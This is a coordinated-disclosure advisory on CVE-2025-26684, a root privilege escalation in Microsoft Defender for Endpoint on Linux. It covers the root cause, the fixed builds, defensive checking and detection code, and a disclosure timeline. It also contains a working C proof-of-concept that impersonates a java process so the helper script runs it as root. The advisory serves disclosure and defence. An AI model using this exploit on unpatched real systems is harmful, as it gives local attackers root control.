May 13, 2025

By Rich Mirch

Vulnerability advisory: Microsoft Defender for Endpoint on Linux elevation of privilege

Stratascale’s Cybersecurity Research Unit (CRU) recently discovered an elevation of privilege vulnerability in Microsoft Defender for Endpoint on Linux and disclosed the vulnerability to the Microsoft Security Response Center (MSRC) who assigned it CVE-2025-26684 and released a fix.

Introduction

Microsoft Defender for Endpoint (MDE) is a comprehensive enterprise endpoint security platform designed to help organizations prevent, detect, investigate, and respond to advanced threats. It safeguards a wide range of devices, including Windows and Mac client computers, Windows and Linux servers, as well as iOS and Android mobile devices. It provides various capabilities such as endpoint detection and response, threat protection, and posture management. Source: Microsoft Defender for Endpoint on Linux.

The Stratascale Cyber Research Unit (CRU) team discovered an elevation of privilege vulnerability in a helper script that is used to enumerate versions of software installed on the system.

Impact

  • A local unprivileged user could elevate permissions to root if a vulnerable version is installed.

Remediation

MDE for Linux Versions

Status       Build                              Release Version
Remediated   May-2025 Build: 101.25032.0008     TBD
Vulnerable   April-2025 Build: 101.25022.0002   30.125022.0001.0
Vulnerable   March-2025 Build: 101.25012.0000   30.125012.0000.0
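As an added example (not Microsoft's or Stratascale's code), the following Python helper turns the table above into a check that can be run against the build string printed by mdatp health --field app_version. It assumes, because the advisory lists only the two builds preceding the fix, that any build older than 101.25032.0008 should be treated as vulnerable.

```python
"""Classify an MDE for Linux build against the CVE-2025-26684 advisory table.
Added example; not Microsoft's or Stratascale's code."""
from typing import Tuple

# First remediated build from the advisory table. Builds older than this are
# treated as vulnerable (an assumption: the table lists only the two prior builds).
FIXED_BUILD = "101.25032.0008"


def parse_build(build: str) -> Tuple[int, ...]:
    """Turn '101.25032.0008', '"101.25032.0008"' or 'Build: 101.25032.0008'
    into (101, 25032, 8) so that builds compare numerically, not as strings."""
    text = build.strip().strip('"')
    if text.lower().startswith("build:"):
        text = text.split(":", 1)[1].strip()
    parts = text.split(".")
    if len(parts) != 3 or not all(part.isdigit() for part in parts):
        raise ValueError(f"unrecognised MDE build string: {build!r}")
    return tuple(int(part) for part in parts)


def is_vulnerable(build: str) -> bool:
    """True when the build predates the remediated build."""
    return parse_build(build) < parse_build(FIXED_BUILD)


def status(build: str) -> str:
    """Verdict mirroring the Status column of the advisory table."""
    return "Vulnerable" if is_vulnerable(build) else "Remediated"


if __name__ == "__main__":
    # Constructed samples: the three builds from the advisory table.
    for sample in ("101.25012.0000", "101.25022.0002", "101.25032.0008"):
        print(sample, status(sample))
```

The comparison is done on integer tuples rather than strings so that a later build such as 101.25100.0001 sorts after 101.25032.0008; a string comparison would get that wrong once a component changes width.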

CVE-2025-26684 Elevation of Privilege Walkthrough

The MDE on Linux packages includes a Python helper script to enumerate versions of software installed and running on the system. A subset of the functionality inspects running Java processes that have instances of the Apache Log4j loaded to determine the version in use.

The /opt/microsoft/mdatp/conf/scripts/open_files.py helper script executes at regular intervals and is spawned by the root-owned wdavdaemon process. To determine the Java Runtime Environment (JRE) version, the open_files.py script looks for any processes named java or javaw. If one is found, it executes java -version to determine the version.

Example output of what java -version would return.

An example usage statement was found at the top of the open_files.py script. The command was reformatted across multiple lines for readability. Note the --filter-command "java,javaw" option.

At the start of the script, a list of file handles (open files) is built by calling lsof_entries(), which is a wrapper function for list_open_file_handles().

The list_open_file_handles() function uses the arguments passed to the script via the --filter-command option.

The --filter-command arguments, "java,javaw", are passed into the following lsof command, which finds open files for any processes named java or javaw; the function then returns a list of process IDs (PIDs).

The list of PIDs is passed to various functions to inspect environment variables, ports, and other information. The version of the JRE is determined by calling the grab_java_version() function.

The grab_java_version() function is where the vulnerability exists. The function determines the location of the java binary on disk by checking the /proc/<PID>/exe symbolic link and then executes the java -version command.

The problem is that the java binary may be running from an untrusted location. A malicious local unprivileged user can create a process named java or javaw, and its binary will eventually be executed with root privileges when the script tries to determine the JRE version.

What follows is a manual walk-through of how the proof-of-concept exploit works. A process is created with the name java or javaw. The malicious "java" application also opens a file whose name begins with log4j, which makes it look as though the Apache Log4j library is in use. The log4j pattern is determined by the --filter-name option.

The following is output from the lsof command that the open_files.py script will execute. A process named java is running from the /home/lowpriv/bin/install location and has a file named log4j-1.4.11.zip open. This satisfies the conditions of the script.

The open_files.py script has now found a java process with a log4j library open. One of the final checks is to execute java -version to determine the JRE version. Examining the /proc/<pid>/exe symbolic link shows that the java binary is at a location under the control of the low-privileged user, /home/lowpriv/bin/install/java. When the script executes that binary as root, arbitrary command execution as root is achieved.

The process listing written by the exploit to /woot.txt shows the process hierarchy and confirms that open_files.py executed our malicious java binary as root.

Inspecting the parent process of the open_files.py script shows that wdavdaemon executed it.
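The root cause is that a root process trusts whatever /proc/<pid>/exe resolves to. The following Python, added here as an illustration and not code from open_files.py or Microsoft, shows the check the helper lacked (owner, permission bits and an allow-list of install prefixes applied to the resolved target) and a detection pass over a constructed process table modelled on the hierarchy recorded in /woot.txt: root processes descending from open_files.py whose executable fails that policy. The trusted prefixes, the Proc record layout and the sample table are assumptions for the example and should be matched to the host's real JRE locations and to whatever process telemetry is actually collected.

```python
"""Defensive checks for the pattern behind CVE-2025-26684: a root-owned helper
resolves a binary through /proc/<pid>/exe and executes it without verifying
where that binary lives. Added example; not code from open_files.py or Microsoft."""
import os
import stat
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Assumed trusted JRE locations; adjust to the host's actual install paths.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/lib/jvm/", "/opt/java/")


def classify_exe(path: str, uid: int, mode: int,
                 trusted_prefixes: Iterable[str] = TRUSTED_PREFIXES) -> str:
    """Policy check on an already-resolved executable path.

    Returns "trusted" only if the file is owned by root, not writable by group
    or others, and sits under a trusted prefix. Any other outcome names the
    failed condition so it can be logged."""
    if not path.startswith("/") or path.endswith(" (deleted)"):
        return "untrusted: relative or deleted path"
    if uid != 0:
        return f"untrusted: owned by uid {uid}, not root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "untrusted: group- or world-writable"
    if not any(path.startswith(prefix) for prefix in trusted_prefixes):
        return "untrusted: outside trusted prefixes"
    return "trusted"


def check_pid_exe(pid: int) -> str:
    """Live variant for a running process: resolve /proc/<pid>/exe and stat the
    target file (not the symlink), then apply the same policy."""
    target = os.readlink(f"/proc/{pid}/exe")
    st = os.stat(target)
    return classify_exe(target, st.st_uid, st.st_mode)


@dataclass
class Proc:
    """One row of a process table, as a detection pipeline might record it (assumed layout)."""
    pid: int
    ppid: int
    uid: int        # uid the process runs as
    cmd: str        # command line
    exe: str        # resolved /proc/<pid>/exe target
    exe_uid: int    # owner of that file
    exe_mode: int   # permission bits of that file


def ancestors(proc: Proc, by_pid: Dict[int, Proc]) -> List[Proc]:
    """Parent chain from proc up to init, guarding against ppid cycles."""
    chain, seen, cur = [], set(), by_pid.get(proc.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def find_helper_spawned_untrusted(procs: Iterable[Proc],
                                  helper: str = "open_files.py") -> List[Proc]:
    """Flag root processes that descend from the helper script and whose
    executable fails the trust policy: the evidence pattern in the advisory."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in by_pid.values():
        if p.uid != 0:
            continue
        if not any(helper in a.cmd for a in ancestors(p, by_pid)):
            continue
        if classify_exe(p.exe, p.exe_uid, p.exe_mode) != "trusted":
            hits.append(p)
    return hits


# Constructed process table modelled on the hierarchy the advisory describes.
SAMPLE_PROCS = [
    Proc(1, 0, 0, "/sbin/init", "/usr/lib/systemd/systemd", 0, 0o755),
    Proc(100, 1, 0, "/opt/microsoft/mdatp/sbin/wdavdaemon",
         "/opt/microsoft/mdatp/sbin/wdavdaemon", 0, 0o755),
    Proc(200, 100, 0, "python3 /opt/microsoft/mdatp/conf/scripts/open_files.py",
         "/usr/bin/python3", 0, 0o755),
    # Benign: a system JRE queried by the helper.
    Proc(300, 200, 0, "/usr/bin/java -version", "/usr/bin/java", 0, 0o755),
    # The advisory's case: a user-controlled "java" executed as root.
    Proc(301, 200, 0, "java -version", "/home/lowpriv/bin/install/java", 1000, 0o755),
    # The low-privileged user's own java process: not root, so not a hit.
    Proc(400, 1, 1000, "java", "/home/lowpriv/bin/install/java", 1000, 0o755),
]

if __name__ == "__main__":
    for hit in find_helper_spawned_untrusted(SAMPLE_PROCS):
        print(f"pid {hit.pid}: {hit.exe} -> "
              f"{classify_exe(hit.exe, hit.exe_uid, hit.exe_mode)}")
```

The live check stats the link target rather than the link itself, because the permission bits on /proc/<pid>/exe say nothing about the file it points to; the "(deleted)" suffix is treated as untrusted because it means the binary on disk no longer matches what is running.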

Proof of concept code:

//////////////////////////////////////////////////////
// CVE-2025-26684 MDE Linux EoP
// by Rich Mirch @ Stratascale Cyber Research Unit
//////////////////////////////////////////////////////
// gcc -o java java.c -Wall
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>

int main(void){
    if(geteuid() == 0) {
        // Running as root: open_files.py has executed this binary as "java -version".
        system("ps -ef >/woot.txt");
    } else {
        // Running as the low-privileged user: keep a log4j-named file open so the
        // script's lsof filter matches, then wait for /woot.txt to appear.
        FILE *fp;
        fp = fopen("log4j-1.4.11.zip","w");
        if (fp == NULL) {
            perror("fopen");
            return 1;
        }

        while(1) {
            if (access("/woot.txt", F_OK) == 0) {
                  printf("/woot.txt found exploit success!\n");
                  fclose(fp);
                  exit(0);
            }
            sleep(15);
        }
    }
    return 0;
}

The Fix

Microsoft resolved the issue by removing the vulnerable code. The following diff snippet between build versions v101.25022.0002 and v101.25032.0008 shows that the grab_java_version() function was removed.

Disclosure Timeline

2025-03-18 Vulnerability submitted to MSRC
2025-03-19 MSRC opened a case for the issue
2025-04-08 Stratascale CRU asks MSRC if any additional information is needed
2025-04-09 MSRC replied, no details are needed at this time
2025-04-17 MSRC confirms the issue; assigned CVE-2025-26684
2025-04-17 MSRC determines another researcher previously reported this issue, and this one will be considered a duplicate
2025-05-06 Confirmed with MSRC that it is okay to publish a blog post on Patch Tuesday
2025-05-07 Microsoft requests to review the draft blog to confirm technical accuracy
2025-05-08 Draft blog sent to MSRC for review
2025-05-09 MSRC acknowledged receipt of the draft blog and will provide technical feedback if needed
2025-05-13 Coordinated Public Disclosure

Credit

The CVE-2025-26684 MDE on Linux Elevation of Privilege vulnerability was discovered and reported to Microsoft by Rich Mirch of the Stratascale Cyber Research Unit.
